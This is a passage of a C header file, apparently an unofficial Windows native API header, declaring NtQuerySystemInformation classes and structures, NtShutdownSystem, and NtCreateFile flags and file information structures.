1234 |     IN PRTL_QUERY_REGISTRY_TABLE  QueryTable,
1235 |     IN PVOID  Context,
1236 |     IN PVOID  Environment OPTIONAL
1237 |     );
1238 | 
1239 | 
1240 | //-----------------------------------------------------------------------------
1241 | // Query system information
1242 | 
1243 | typedef enum _SYSTEM_INFORMATION_CLASS
1244 | {
1245 |     SystemBasicInformation,                 // 0x00 SYSTEM_BASIC_INFORMATION
1246 |     SystemProcessorInformation,             // 0x01 SYSTEM_PROCESSOR_INFORMATION
1247 |     SystemPerformanceInformation,           // 0x02
1248 |     SystemTimeOfDayInformation,             // 0x03
1249 |     SystemPathInformation,                  // 0x04
1250 |     SystemProcessInformation,               // 0x05
1251 |     SystemCallCountInformation,             // 0x06
1252 |     SystemDeviceInformation,                // 0x07
1253 |     SystemProcessorPerformanceInformation,  // 0x08
1254 |     SystemFlagsInformation,                 // 0x09
1255 |     SystemCallTimeInformation,              // 0x0A
1256 |     SystemModuleInformation,                // 0x0B SYSTEM_MODULE_INFORMATION
1257 |     SystemLocksInformation,                 // 0x0C
1258 |     SystemStackTraceInformation,            // 0x0D
1259 |     SystemPagedPoolInformation,             // 0x0E
1260 |     SystemNonPagedPoolInformation,          // 0x0F
1261 |     SystemHandleInformation,                // 0x10
1262 |     SystemObjectInformation,                // 0x11
1263 |     SystemPageFileInformation,              // 0x12
1264 |     SystemVdmInstemulInformation,           // 0x13
1265 |     SystemVdmBopInformation,                // 0x14
1266 |     SystemFileCacheInformation,             // 0x15
1267 |     SystemPoolTagInformation,               // 0x16
1268 |     SystemInterruptInformation,             // 0x17
1269 |     SystemDpcBehaviorInformation,           // 0x18
1270 |     SystemFullMemoryInformation,            // 0x19
1271 |     SystemLoadGdiDriverInformation,         // 0x1A
1272 |     SystemUnloadGdiDriverInformation,       // 0x1B
1273 |     SystemTimeAdjustmentInformation,        // 0x1C
1274 |     SystemSummaryMemoryInformation,         // 0x1D
1275 |     SystemNextEventIdInformation,           // 0x1E
1276 |     SystemEventIdsInformation,              // 0x1F
1277 |     SystemCrashDumpInformation,             // 0x20
1278 |     SystemExceptionInformation,             // 0x21
1279 |     SystemCrashDumpStateInformation,        // 0x22
1280 |     SystemKernelDebuggerInformation,        // 0x23
1281 |     SystemContextSwitchInformation,         // 0x24
1282 |     SystemRegistryQuotaInformation,         // 0x25
1283 |     SystemExtendServiceTableInformation,    // 0x26
1284 |     SystemPrioritySeperation,               // 0x27
1285 |     SystemPlugPlayBusInformation,           // 0x28
1286 |     SystemDockInformation,                  // 0x29
1287 |     //SystemPowerInformation,               // 0x2A
1288 |     //SystemProcessorSpeedInformation,      // 0x2B
1289 |     //SystemCurrentTimeZoneInformation,     // 0x2C
1290 |     //SystemLookasideInformation            // 0x2D
1291 | 
1292 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
1293 | 
1294 | //
1295 | // Thread priority
1296 | //
1297 | 
1298 | typedef LONG KPRIORITY;
1299 | 
1300 | //
1301 | // Basic System information
1302 | // NtQuerySystemInformation with SystemBasicInformation
1303 | //
1304 | 
1305 | typedef struct _SYSTEM_BASIC_INFORMATION {
1306 |     ULONG Reserved;
1307 |     ULONG TimerResolution;
1308 |     ULONG PageSize;
1309 |     ULONG NumberOfPhysicalPages;
1310 |     ULONG LowestPhysicalPageNumber;
1311 |     ULONG HighestPhysicalPageNumber;
1312 |     ULONG AllocationGranularity;
1313 |     ULONG MinimumUserModeAddress;
1314 |     ULONG MaximumUserModeAddress;
1315 |     KAFFINITY ActiveProcessorsAffinityMask;
1316 |     CCHAR NumberOfProcessors;
1317 | } SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;
1318 | 
1319 | //
1320 | // Processor information
1321 | // NtQuerySystemInformation with SystemProcessorInformation
1322 | //
1323 | 
1324 | typedef struct _SYSTEM_PROCESSOR_INFORMATION {
1325 |     USHORT ProcessorArchitecture;
1326 |     USHORT ProcessorLevel;
1327 |     USHORT ProcessorRevision;
1328 |     USHORT Reserved;
1329 |     ULONG ProcessorFeatureBits;
1330 | } SYSTEM_PROCESSOR_INFORMATION, *PSYSTEM_PROCESSOR_INFORMATION;
1331 | 
1332 | //
1333 | // Performance information
1334 | // NtQuerySystemInformation with SystemPerformanceInformation
1335 | //
1336 | 
1337 | typedef struct _SYSTEM_PERFORMANCE_INFORMATION {
1338 |     LARGE_INTEGER IdleProcessTime;
1339 |     LARGE_INTEGER IoReadTransferCount;
1340 |     LARGE_INTEGER IoWriteTransferCount;
1341 |     LARGE_INTEGER IoOtherTransferCount;
1342 |     ULONG IoReadOperationCount;
1343 |     ULONG IoWriteOperationCount;
1344 |     ULONG IoOtherOperationCount;
1345 |     ULONG AvailablePages;
1346 |     ULONG CommittedPages;
1347 |     ULONG CommitLimit;
1348 |     ULONG PeakCommitment;
1349 |     ULONG PageFaultCount;
1350 |     ULONG CopyOnWriteCount;
1351 |     ULONG TransitionCount;
1352 |     ULONG CacheTransitionCount;
1353 |     ULONG DemandZeroCount;
1354 |     ULONG PageReadCount;
1355 |     ULONG PageReadIoCount;
1356 |     ULONG CacheReadCount;
1357 |     ULONG CacheIoCount;
1358 |     ULONG DirtyPagesWriteCount;
1359 |     ULONG DirtyWriteIoCount;
1360 |     ULONG MappedPagesWriteCount;
1361 |     ULONG MappedWriteIoCount;
1362 |     ULONG PagedPoolPages;
1363 |     ULONG NonPagedPoolPages;
1364 |     ULONG PagedPoolAllocs;
1365 |     ULONG PagedPoolFrees;
1366 |     ULONG NonPagedPoolAllocs;
1367 |     ULONG NonPagedPoolFrees;
1368 |     ULONG FreeSystemPtes;
1369 |     ULONG ResidentSystemCodePage;
1370 |     ULONG TotalSystemDriverPages;
1371 |     ULONG TotalSystemCodePages;
1372 |     ULONG NonPagedPoolLookasideHits;
1373 |     ULONG PagedPoolLookasideHits;
1374 |     ULONG Spare3Count;
1375 |     ULONG ResidentSystemCachePage;
1376 |     ULONG ResidentPagedPoolPage;
1377 |     ULONG ResidentSystemDriverPage;
1378 |     ULONG CcFastReadNoWait;
1379 |     ULONG CcFastReadWait;
1380 |     ULONG CcFastReadResourceMiss;
1381 |     ULONG CcFastReadNotPossible;
1382 |     ULONG CcFastMdlReadNoWait;
1383 |     ULONG CcFastMdlReadWait;
1384 |     ULONG CcFastMdlReadResourceMiss;
1385 |     ULONG CcFastMdlReadNotPossible;
1386 |     ULONG CcMapDataNoWait;
1387 |     ULONG CcMapDataWait;
1388 |     ULONG CcMapDataNoWaitMiss;
1389 |     ULONG CcMapDataWaitMiss;
1390 |     ULONG CcPinMappedDataCount;
1391 |     ULONG CcPinReadNoWait;
1392 |     ULONG CcPinReadWait;
1393 |     ULONG CcPinReadNoWaitMiss;
1394 |     ULONG CcPinReadWaitMiss;
1395 |     ULONG CcCopyReadNoWait;
1396 |     ULONG CcCopyReadWait;
1397 |     ULONG CcCopyReadNoWaitMiss;
1398 |     ULONG CcCopyReadWaitMiss;
1399 |     ULONG CcMdlReadNoWait;
1400 |     ULONG CcMdlReadWait;
1401 |     ULONG CcMdlReadNoWaitMiss;
1402 |     ULONG CcMdlReadWaitMiss;
1403 |     ULONG CcReadAheadIos;
1404 |     ULONG CcLazyWriteIos;
1405 |     ULONG CcLazyWritePages;
1406 |     ULONG CcDataFlushes;
1407 |     ULONG CcDataPages;
1408 |     ULONG ContextSwitches;
1409 |     ULONG FirstLevelTbFills;
1410 |     ULONG SecondLevelTbFills;
1411 |     ULONG SystemCalls;
1412 | } SYSTEM_PERFORMANCE_INFORMATION, *PSYSTEM_PERFORMANCE_INFORMATION;
1413 | 
1414 | //
1415 | // Time of Day information
1416 | // NtQuerySystemInformation with SystemTimeOfDayInformation
1417 | //
1418 | 
1419 | typedef struct _SYSTEM_TIMEOFDAY_INFORMATION {
1420 |     LARGE_INTEGER BootTime;
1421 |     LARGE_INTEGER CurrentTime;
1422 |     LARGE_INTEGER TimeZoneBias;
1423 |     ULONG TimeZoneId;
1424 |     ULONG Reserved;
1425 | } SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION;
1426 | 
1427 | //
1428 | // Process information
1429 | // NtQuerySystemInformation with SystemProcessInformation
1430 | //
1431 | 
1432 | typedef struct _SYSTEM_PROCESS_INFORMATION {
1433 |     ULONG NextEntryOffset;
1434 |     ULONG NumberOfThreads;
1435 |     LARGE_INTEGER SpareLi1;
1436 |     LARGE_INTEGER SpareLi2;
1437 |     LARGE_INTEGER SpareLi3;
1438 |     LARGE_INTEGER CreateTime;
1439 |     LARGE_INTEGER UserTime;
1440 |     LARGE_INTEGER KernelTime;
1441 |     UNICODE_STRING ImageName;
1442 |     KPRIORITY BasePriority;
1443 |     ULONG_PTR UniqueProcessId;
1444 |     ULONG_PTR InheritedFromUniqueProcessId;
1445 |     ULONG HandleCount;
1446 |     // Next part is platform dependent
1447 | 
1448 | } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
1449 | 
1450 | //
1451 | // Device information
1452 | // NtQuerySystemInformation with SystemDeviceInformation
1453 | //
1454 | 
1455 | typedef struct _SYSTEM_DEVICE_INFORMATION {
1456 |     ULONG NumberOfDisks;
1457 |     ULONG NumberOfFloppies;
1458 |     ULONG NumberOfCdRoms;
1459 |     ULONG NumberOfTapes;
1460 |     ULONG NumberOfSerialPorts;
1461 |     ULONG NumberOfParallelPorts;
1462 | } SYSTEM_DEVICE_INFORMATION, *PSYSTEM_DEVICE_INFORMATION;
1463 | 
1464 | //
1465 | // Processor performance information
1466 | // NtQuerySystemInformation with SystemProcessorPerformanceInformation
1467 | //
1468 | 
1469 | typedef struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION {
1470 |     LARGE_INTEGER IdleTime;
1471 |     LARGE_INTEGER KernelTime;
1472 |     LARGE_INTEGER UserTime;
1473 |     LARGE_INTEGER DpcTime;          // DEVL only
1474 |     LARGE_INTEGER InterruptTime;    // DEVL only
1475 |     ULONG InterruptCount;
1476 | } SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION, *PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION;
1477 | 
1478 | //
1479 | // NT Global Flag information
1480 | // NtQuerySystemInformation with SystemFlagsInformation
1481 | //
1482 | 
1483 | typedef struct _SYSTEM_FLAGS_INFORMATION
1484 | {
1485 |     ULONG GlobalFlag;
1486 | 
1487 | } SYSTEM_FLAGS_INFORMATION, *PSYSTEM_FLAGS_INFORMATION;
1488 | 
1489 | //
1490 | // System Module information
1491 | // NtQuerySystemInformation with SystemModuleInformation
1492 | //
1493 | 
1494 | typedef struct _SYSTEM_MODULE
1495 | {
1496 |     ULONG  Reserved1;                   // Should be 0xBAADF00D
1497 |     ULONG  Reserved2;                   // Should be zero
1498 |     PVOID  Base;
1499 |     ULONG  Size;
1500 |     ULONG  Flags;
1501 |     USHORT Index;
1502 |     USHORT Unknown;
1503 |     USHORT LoadCount;
1504 |     USHORT ModuleNameOffset;
1505 |     CHAR   ImageName[256];
1506 | 
1507 | } SYSTEM_MODULE, *PSYSTEM_MODULE;
1508 | 
1509 | 
1510 | typedef struct _SYSTEM_MODULE_INFORMATION
1511 | {
1512 |     ULONG         ModulesCount;
1513 |     SYSTEM_MODULE Modules[1];
1514 | 
1515 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
1516 | 
1517 | /*
1518 | typedef struct _SYSTEM_VDM_INSTEMUL_INFO {
1519 |     ULONG SegmentNotPresent ;
1520 |     ULONG VdmOpcode0F       ;
1521 |     ULONG OpcodeESPrefix    ;
1522 |     ULONG OpcodeCSPrefix    ;
1523 |     ULONG OpcodeSSPrefix    ;
1524 |     ULONG OpcodeDSPrefix    ;
1525 |     ULONG OpcodeFSPrefix    ;
1526 |     ULONG OpcodeGSPrefix    ;
1527 |     ULONG OpcodeOPER32Prefix;
1528 |     ULONG OpcodeADDR32Prefix;
1529 |     ULONG OpcodeINSB        ;
1530 |     ULONG OpcodeINSW        ;
1531 |     ULONG OpcodeOUTSB       ;
1532 |     ULONG OpcodeOUTSW       ;
1533 |     ULONG OpcodePUSHF       ;
1534 |     ULONG OpcodePOPF        ;
1535 |     ULONG OpcodeINTnn       ;
1536 |     ULONG OpcodeINTO        ;
1537 |     ULONG OpcodeIRET        ;
1538 |     ULONG OpcodeINBimm      ;
1539 |     ULONG OpcodeINWimm      ;
1540 |     ULONG OpcodeOUTBimm     ;
1541 |     ULONG OpcodeOUTWimm     ;
1542 |     ULONG OpcodeINB         ;
1543 |     ULONG OpcodeINW         ;
1544 |     ULONG OpcodeOUTB        ;
1545 |     ULONG OpcodeOUTW        ;
1546 |     ULONG OpcodeLOCKPrefix  ;
1547 |     ULONG OpcodeREPNEPrefix ;
1548 |     ULONG OpcodeREPPrefix   ;
1549 |     ULONG OpcodeHLT         ;
1550 |     ULONG OpcodeCLI         ;
1551 |     ULONG OpcodeSTI         ;
1552 |     ULONG BopCount          ;
1553 | } SYSTEM_VDM_INSTEMUL_INFO, *PSYSTEM_VDM_INSTEMUL_INFO;
1554 | 
1555 | 
1556 | typedef struct _SYSTEM_QUERY_TIME_ADJUST_INFORMATION {
1557 |     ULONG TimeAdjustment;
1558 |     ULONG TimeIncrement;
1559 |     BOOLEAN Enable;
1560 | } SYSTEM_QUERY_TIME_ADJUST_INFORMATION, *PSYSTEM_QUERY_TIME_ADJUST_INFORMATION;
1561 | 
1562 | typedef struct _SYSTEM_SET_TIME_ADJUST_INFORMATION {
1563 |     ULONG TimeAdjustment;
1564 |     BOOLEAN Enable;
1565 | } SYSTEM_SET_TIME_ADJUST_INFORMATION, *PSYSTEM_SET_TIME_ADJUST_INFORMATION;
1566 | 
1567 | 
1568 | typedef struct _SYSTEM_THREAD_INFORMATION {
1569 |     LARGE_INTEGER KernelTime;
1570 |     LARGE_INTEGER UserTime;
1571 |     LARGE_INTEGER CreateTime;
1572 |     ULONG WaitTime;
1573 |     PVOID StartAddress;
1574 |     CLIENT_ID ClientId;
1575 |     KPRIORITY Priority;
1576 |     LONG BasePriority;
1577 |     ULONG ContextSwitches;
1578 |     ULONG ThreadState;
1579 |     ULONG WaitReason;
1580 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
1581 | 
1582 | typedef struct _SYSTEM_MEMORY_INFO {
1583 |     PUCHAR StringOffset;
1584 |     USHORT ValidCount;
1585 |     USHORT TransitionCount;
1586 |     USHORT ModifiedCount;
1587 |     USHORT PageTableCount;
1588 | } SYSTEM_MEMORY_INFO, *PSYSTEM_MEMORY_INFO;
1589 | 
1590 | typedef struct _SYSTEM_MEMORY_INFORMATION {
1591 |     ULONG InfoSize;
1592 |     ULONG StringStart;
1593 |     SYSTEM_MEMORY_INFO Memory[1];
1594 | } SYSTEM_MEMORY_INFORMATION, *PSYSTEM_MEMORY_INFORMATION;
1595 | 
1596 | typedef struct _SYSTEM_CALL_COUNT_INFORMATION {
1597 |     ULONG Length;
1598 |     ULONG NumberOfTables;
1599 |     //ULONG NumberOfEntries[NumberOfTables];
1600 |     //ULONG CallCounts[NumberOfTables][NumberOfEntries];
1601 | } SYSTEM_CALL_COUNT_INFORMATION, *PSYSTEM_CALL_COUNT_INFORMATION;
1602 | 
1603 | typedef struct _SYSTEM_CRASH_DUMP_INFORMATION {
1604 |     HANDLE CrashDumpSection;
1605 | } SYSTEM_CRASH_DUMP_INFORMATION, *PSYSTEM_CRASH_DUMP_INFORMATION;
1606 | 
1607 | typedef struct _SYSTEM_EXCEPTION_INFORMATION {
1608 |     ULONG AlignmentFixupCount;
1609 |     ULONG ExceptionDispatchCount;
1610 |     ULONG FloatingEmulationCount;
1611 |     ULONG ByteWordEmulationCount;
1612 | } SYSTEM_EXCEPTION_INFORMATION, *PSYSTEM_EXCEPTION_INFORMATION;
1613 | 
1614 | typedef struct _SYSTEM_CRASH_STATE_INFORMATION {
1615 |     ULONG ValidCrashDump;
1616 | } SYSTEM_CRASH_STATE_INFORMATION, *PSYSTEM_CRASH_STATE_INFORMATION;
1617 | 
1618 | typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {
1619 |     BOOLEAN KernelDebuggerEnabled;
1620 |     BOOLEAN KernelDebuggerNotPresent;
1621 | } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;
1622 | 
1623 | typedef struct _SYSTEM_REGISTRY_QUOTA_INFORMATION {
1624 |     ULONG RegistryQuotaAllowed;
1625 |     ULONG RegistryQuotaUsed;
1626 |     ULONG PagedPoolSize;
1627 | } SYSTEM_REGISTRY_QUOTA_INFORMATION, *PSYSTEM_REGISTRY_QUOTA_INFORMATION;
1628 | 
1629 | typedef struct _SYSTEM_GDI_DRIVER_INFORMATION {
1630 |     UNICODE_STRING DriverName;
1631 |     PVOID ImageAddress;
1632 |     PVOID SectionPointer;
1633 |     PVOID EntryPoint;
1634 |     PIMAGE_EXPORT_DIRECTORY ExportSectionPointer;
1635 | } SYSTEM_GDI_DRIVER_INFORMATION, *PSYSTEM_GDI_DRIVER_INFORMATION;
1636 | */
1637 | 
1638 | NTSYSAPI
1639 | NTSTATUS
1640 | NTAPI
1641 | NtQuerySystemInformation(
1642 |     IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
1643 |     OUT PVOID SystemInformation,
1644 |     IN ULONG SystemInformationLength,
1645 |     OUT PULONG ReturnLength
1646 |     );
1647 | 
1648 | //------------------------------------------------------------------------------
1649 | // Shutdown system
1650 | 
1651 | typedef enum _SHUTDOWN_ACTION
1652 | {
1653 |     ShutdownNoReboot,
1654 |     ShutdownReboot,
1655 |     ShutdownPowerOff
1656 | 
1657 | } SHUTDOWN_ACTION, *PSHUTDOWN_ACTION;
1658 | 
1659 | 
1660 | NTSYSAPI
1661 | NTSTATUS
1662 | NTAPI
1663 | NtShutdownSystem(
1664 |     IN SHUTDOWN_ACTION Action
1665 |     );
1666 | 
1667 | //-----------------------------------------------------------------------------
1668 | // File functions
1669 | 
1670 | #ifndef OLD_DOS_VOLID
1671 | #define OLD_DOS_VOLID   0x00000008
1672 | #endif
1673 | 
1674 | #ifndef FILE_SUPERSEDE
1675 | #define FILE_SUPERSEDE                  0x00000000
1676 | #define FILE_OPEN                       0x00000001
1677 | #define FILE_CREATE                     0x00000002
1678 | #define FILE_OPEN_IF                    0x00000003
1679 | #define FILE_OVERWRITE                  0x00000004
1680 | #define FILE_OVERWRITE_IF               0x00000005
1681 | #define FILE_MAXIMUM_DISPOSITION        0x00000005
1682 | #endif  // File create flags
1683 | 
1684 | 
1685 | // Define the create/open option flags
1686 | #ifndef FILE_DIRECTORY_FILE
1687 | #define FILE_DIRECTORY_FILE                     0x00000001
1688 | #define FILE_WRITE_THROUGH                      0x00000002
1689 | #define FILE_SEQUENTIAL_ONLY                    0x00000004
1690 | #define FILE_NO_INTERMEDIATE_BUFFERING          0x00000008
1691 | #define FILE_SYNCHRONOUS_IO_ALERT               0x00000010
1692 | #define FILE_SYNCHRONOUS_IO_NONALERT            0x00000020
1693 | #define FILE_NON_DIRECTORY_FILE                 0x00000040
1694 | #define FILE_CREATE_TREE_CONNECTION             0x00000080
1695 | #define FILE_COMPLETE_IF_OPLOCKED               0x00000100
1696 | #define FILE_NO_EA_KNOWLEDGE                    0x00000200
1697 | #define FILE_OPEN_FOR_RECOVERY                  0x00000400
1698 | #define FILE_RANDOM_ACCESS                      0x00000800
1699 | #define FILE_DELETE_ON_CLOSE                    0x00001000
1700 | #define FILE_OPEN_BY_FILE_ID                    0x00002000
1701 | #define FILE_OPEN_FOR_BACKUP_INTENT             0x00004000
1702 | #define FILE_NO_COMPRESSION                     0x00008000
1703 | #define FILE_RESERVE_OPFILTER                   0x00100000
1704 | #define FILE_OPEN_REPARSE_POINT                 0x00200000
1705 | #define FILE_OPEN_NO_RECALL                     0x00400000
1706 | #define FILE_OPEN_FOR_FREE_SPACE_QUERY          0x00800000
1707 | #endif // FILE_DIRECTORY_FILE
1708 | 
1709 | 
1710 | //
1711 | // Define the I/O status information return values for NtCreateFile/NtOpenFile
1712 | //
1713 | 
1714 | #ifndef FILE_SUPERSEDED
1715 | #define FILE_SUPERSEDED                 0x00000000
1716 | #define FILE_OPENED                     0x00000001
1717 | #define FILE_CREATED                    0x00000002
1718 | #define FILE_OVERWRITTEN                0x00000003
1719 | #define FILE_EXISTS                     0x00000004
1720 | #define FILE_DOES_NOT_EXIST             0x00000005
1721 | #endif
1722 | 
1723 | 
1724 | #ifndef PIO_APC_ROUTINE_DEFINED
1725 | typedef
1726 | VOID
1727 | (NTAPI *PIO_APC_ROUTINE) (
1728 |     IN PVOID ApcContext,
1729 |     IN PIO_STATUS_BLOCK IoStatusBlock,
1730 |     IN ULONG Reserved
1731 |     );
1732 | #define PIO_APC_ROUTINE_DEFINED
1733 | #endif  // PIO_APC_ROUTINE_DEFINED
1734 | 
1735 | 
1736 | typedef enum _FILE_INFORMATION_CLASS
1737 | {
1738 |     FileDirectoryInformation         = 1,
1739 |     FileFullDirectoryInformation,   // 2
1740 |     FileBothDirectoryInformation,   // 3
1741 |     FileBasicInformation,           // 4  wdm
1742 |     FileStandardInformation,        // 5  wdm
1743 |     FileInternalInformation,        // 6
1744 |     FileEaInformation,              // 7
1745 |     FileAccessInformation,          // 8
1746 |     FileNameInformation,            // 9
1747 |     FileRenameInformation,          // 10
1748 |     FileLinkInformation,            // 11
1749 |     FileNamesInformation,           // 12
1750 |     FileDispositionInformation,     // 13
1751 |     FilePositionInformation,        // 14 wdm
1752 |     FileFullEaInformation,          // 15
1753 |     FileModeInformation,            // 16
1754 |     FileAlignmentInformation,       // 17
1755 |     FileAllInformation,             // 18
1756 |     FileAllocationInformation,      // 19
1757 |     FileEndOfFileInformation,       // 20 wdm
1758 |     FileAlternateNameInformation,   // 21
1759 |     FileStreamInformation,          // 22
1760 |     FilePipeInformation,            // 23
1761 |     FilePipeLocalInformation,       // 24
1762 |     FilePipeRemoteInformation,      // 25
1763 |     FileMailslotQueryInformation,   // 26
1764 |     FileMailslotSetInformation,     // 27
1765 |     FileCompressionInformation,     // 28
1766 |     FileObjectIdInformation,        // 29
1767 |     FileCompletionInformation,      // 30
1768 |     FileMoveClusterInformation,     // 31
1769 |     FileQuotaInformation,           // 32
1770 |     FileReparsePointInformation,    // 33
1771 |     FileNetworkOpenInformation,     // 34
1772 |     FileAttributeTagInformation,    // 35
1773 |     FileTrackingInformation,        // 36
1774 |     FileIdBothDirectoryInformation, // 37
1775 |     FileIdFullDirectoryInformation, // 38
1776 |     FileValidDataLengthInformation, // 39
1777 |     FileShortNameInformation,       // 40
1778 |     FileIoCompletionNotificationInformation, // 41
1779 |     FileIoStatusBlockRangeInformation,       // 42
1780 |     FileIoPriorityHintInformation,           // 43
1781 |     FileSfioReserveInformation,              // 44
1782 |     FileSfioVolumeInformation,               // 45
1783 |     FileHardLinkInformation,                 // 46
1784 |     FileProcessIdsUsingFileInformation,      // 47
1785 |     FileMaximumInformation                   // 48
1786 | } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
1787 | 
1788 | 
1789 | typedef struct _FILE_DIRECTORY_INFORMATION {
1790 |     ULONG NextEntryOffset;
1791 |     ULONG FileIndex;
1792 |     LARGE_INTEGER CreationTime;
1793 |     LARGE_INTEGER LastAccessTime;
1794 |     LARGE_INTEGER LastWriteTime;
1795 |     LARGE_INTEGER ChangeTime;
1796 |     LARGE_INTEGER EndOfFile;
1797 |     LARGE_INTEGER AllocationSize;
1798 |     ULONG FileAttributes;
1799 |     ULONG FileNameLength;
1800 |     WCHAR FileName[1];
1801 | } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
1802 | 
1803 | 
1804 | typedef struct _FILE_FULL_DIR_INFORMATION {
1805 |     ULONG NextEntryOffset;
1806 |     ULONG FileIndex;
1807 |     LARGE_INTEGER CreationTime;
1808 |     LARGE_INTEGER LastAccessTime;
1809 |     LARGE_INTEGER LastWriteTime;
1810 |     LARGE_INTEGER ChangeTime;
1811 |     LARGE_INTEGER EndOfFile;
1812 |     LARGE_INTEGER AllocationSize;
1813 |     ULONG FileAttributes;
1814 |     ULONG FileNameLength;
1815 |     ULONG EaSize;
1816 |     WCHAR FileName[1];
1817 | } FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
1818 | 
1819 | 
1820 | typedef struct _FILE_BOTH_DIR_INFORMATION {
1821 |     ULONG NextEntryOffset;
1822 |     ULONG FileIndex;
1823 |     LARGE_INTEGER CreationTime;
1824 |     LARGE_INTEGER LastAccessTime;
1825 |     LARGE_INTEGER LastWriteTime;
1826 |     LARGE_INTEGER ChangeTime;
1827 |     LARGE_INTEGER EndOfFile;
1828 |     LARGE_INTEGER AllocationSize;
1829 |     ULONG FileAttributes;
1830 |     ULONG FileNameLength;
1831 |     ULONG EaSize;
1832 |     CCHAR ShortNameLength;
1833 |     WCHAR ShortName[12];
1834 |     WCHAR FileName[1];
1835 | } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
1836 | 
1837 | 
1838 | typedef struct _FILE_BASIC_INFORMATION {
1839 |     LARGE_INTEGER CreationTime;
1840 |     LARGE_INTEGER LastAccessTime;
1841 |     LARGE_INTEGER LastWriteTime;
1842 |     LARGE_INTEGER ChangeTime;
1843 |     ULONG FileAttributes;
1844 | } FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
1845 | 
1846 | 
1847 | typedef struct _FILE_STANDARD_INFORMATION {
1848 |     LARGE_INTEGER AllocationSize;
1849 |     LARGE_INTEGER EndOfFile;
1850 |     ULONG NumberOfLinks;
1851 |     BOOLEAN DeletePending;
1852 |     BOOLEAN Directory;
1853 | } FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION;
1854 | 
1855 | 
1856 | typedef struct _FILE_INTERNAL_INFORMATION {
1857 |     LARGE_INTEGER IndexNumber;
1858 | } FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
1859 | 
1860 | 
1861 | typedef struct _FILE_EA_INFORMATION {
1862 |     ULONG EaSize;
1863 | } FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
1864 | 
1865 | 
1866 | typedef struct _FILE_ACCESS_INFORMATION {
1867 |     ACCESS_MASK AccessFlags;
1868 | } FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
1869 | 
1870 | 
1871 | typedef struct _FILE_NAME_INFORMATION {
1872 |     ULONG FileNameLength;
1873 |     WCHAR FileName[1];
1874 | } FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
1875 | 
1876 | 
1877 | typedef struct _FILE_RENAME_INFORMATION {
1878 |     BOOLEAN ReplaceIfExists;
1879 |     HANDLE RootDirectory;
1880 |     ULONG FileNameLength;
1881 |     WCHAR FileName[1];
1882 | } FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
1883 | 
1884 | 
1885 | typedef struct _FILE_NAMES_INFORMATION {
1886 |     ULONG NextEntryOffset;
1887 |     ULONG FileIndex;
1888 |     ULONG FileNameLength;
1889 |     WCHAR FileName[1];
1890 | } FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;
1891 | 
1892 | 
1893 | typedef struct _FILE_DISPOSITION_INFORMATION {
1894 |     BOOLEAN DeleteFile;
1895 | } FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
1896 | 
1897 | 
1898 | typedef struct _FILE_POSITION_INFORMATION {
1899 |     LARGE_INTEGER CurrentByteOffset;
1900 | } FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
1901 | 
1902 | 
1903 | typedef struct _FILE_FULL_EA_INFORMATION {
1904 |     ULONG NextEntryOffset;
1905 |     UCHAR Flags;
1906 |     UCHAR EaNameLength;
1907 |     USHORT EaValueLength;
1908 |     CHAR EaName[1];
1909 | } FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;
1910 | 
1911 | 
1912 | typedef struct _FILE_MODE_INFORMATION {
1913 |     ULONG Mode;
1914 | } FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
1915 | 
1916 | 
1917 | typedef struct _FILE_ALIGNMENT_INFORMATION {
1918 |     ULONG AlignmentRequirement;
1919 | } FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
1920 | 
1921 | 
1922 | typedef struct _FILE_ALL_INFORMATION {
1923 |     FILE_BASIC_INFORMATION BasicInformation;
1924 |     FILE_STANDARD_INFORMATION StandardInformation;
1925 |     FILE_INTERNAL_INFORMATION InternalInformation;
1926 |     FILE_EA_INFORMATION EaInformation;
1927 |     FILE_ACCESS_INFORMATION AccessInformation;
1928 |     FILE_POSITION_INFORMATION PositionInformation;
1929 |     FILE_MODE_INFORMATION ModeInformation;
1930 |     FILE_ALIGNMENT_INFORMATION AlignmentInformation;
1931 |     FILE_NAME_INFORMATION NameInformation;
1932 | } FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
1933 | 
1934 | 
1935 | typedef struct _FILE_ALLOCATION_INFORMATION {
1936 |     LARGE_INTEGER AllocationSize;
1937 | } FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
1938 | 
1939 | 
1940 | typedef struct _FILE_END_OF_FILE_INFORMATION {
1941 |     LARGE_INTEGER EndOfFile;
1942 | } FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
1943 | 
1944 | 
1945 | typedef struct _FILE_STREAM_INFORMATION {
1946 |     ULONG NextEntryOffset;
1947 |     ULONG StreamNameLength;
1948 |     LARGE_INTEGER StreamSize;
